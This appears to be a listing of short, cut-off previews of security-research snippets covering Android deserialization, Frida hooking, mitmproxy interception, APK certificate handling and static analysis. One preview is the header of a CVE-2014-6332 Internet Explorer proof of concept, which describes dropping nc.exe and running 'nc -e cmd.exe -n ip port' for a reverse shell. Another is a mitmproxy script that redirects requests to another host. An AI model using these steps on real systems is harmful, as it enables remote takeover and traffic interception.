flankerhqd

    static {
        LSOItemData.CREATOR = new Parcelable.Creator() {
            public LSOItemData createFromParcel(Parcel source) {
                try {
                    int v1_1 = source.dataPosition();
                    int v2 = source.readByte();
                    source.setDataPosition(v1_1);
                    return LSOItemCreator.createItem(((byte)v2), source);
                }
                catch(Exception e) {

flankerhqd

# -*- coding: utf-8 -*-  
  
""" 
Sample client script for PNF Software's JEB2. 
 
More samples are available on our website and within the scripts/ folder. 
 
Refer to SCRIPTS.TXT for more information. 
"""  
  

flankerhqd

   //
    //  main.m
    //  cmdqueue1
    //
    //  Created by keen on 2016-04-11.
    //  Copyright © 2016 keen. All rights reserved.
    //
    #include <dlfcn.h>
    #import <Foundation/Foundation.h>
    #include <stdlib.h>

flankerhqd

import mitmproxy
from mitmproxy.models import HTTPResponse
from netlib.http import Headers
import os
def request(context, flow):
	print flow.request.url
	if not flow.request.url.endswith("test.html"):
		return
	print "fuck"
	resp = HTTPResponse([1,1], 302, "Found", ODictCaseless([["Context-Type", "text/html"], ["Location", "http://192.168.12.1/aaa.html"]]), "")

flankerhqd

java -cp soot.jar:app-debug.apk soot.tools.CFGViewer --graph=BriefBlockGraph -src-prec apk -android-jars /home/xxx/android-sdks/platforms/ -process-dir app-debug.apk -f J -allow-phantom-refs

flankerhqd

The MIT License (MIT)

Copyright (c) 2015 David Weinstein

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

flankerhqd

script = session.create_script('''
Dalvik.perform(function () {
    var Activity = Dalvik.use("com.example.myapp.MyActivity");
    Activity.hookMe.overload("java.lang.String").implementation = function () {
        Activity.hookMe.overload("java.lang.String").call(args[0], "foo");//comment out this line won't crash
        return "foo";
    };
});
''')
// This result in immediate crash

flankerhqd

<html>
<head>
<!--
CVE-2014-6332 PoC to bypass IE protected mode if enabled (with localhost) then get shell
The PoC drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target

Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windoes 8.1 64-bit (EPM is off)

flankerhqd

import org.sireum.util._
import org.sireum.jawa.MessageCenter._
import org.sireum.amandroid.alir.reachingFactsAnalysis.AndroidReachingFactsAnalysisConfig
import org.sireum.jawa.util.Timer
import org.sireum.amandroid.security.apiMisuse.InterestingApiCollector
import org.sireum.jawa.MessageCenter._
import org.sireum.amandroid.util.AndroidLibraryAPISummary
import org.sireum.amandroid.AppCenter
import org.sireum.jawa.alir.reachability.ReachabilityAnalysis
import org.sireum.jawa.JawaCodeSource

flankerhqd

import OpenSSL
from OpenSSL.crypto import *
#assume you've already generated client.cer

#extract CERT.RSA
#openssl pkcs7 -in CERT.RSA -print_certs -inform DER -out cert.cer : CA cert isolated from RSA

cacert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, open('cert.cer','r').read())
pk = OpenSSL.crypto.PKey()
pk.generate_key(OpenSSL.crypto.TYPE_RSA,1024)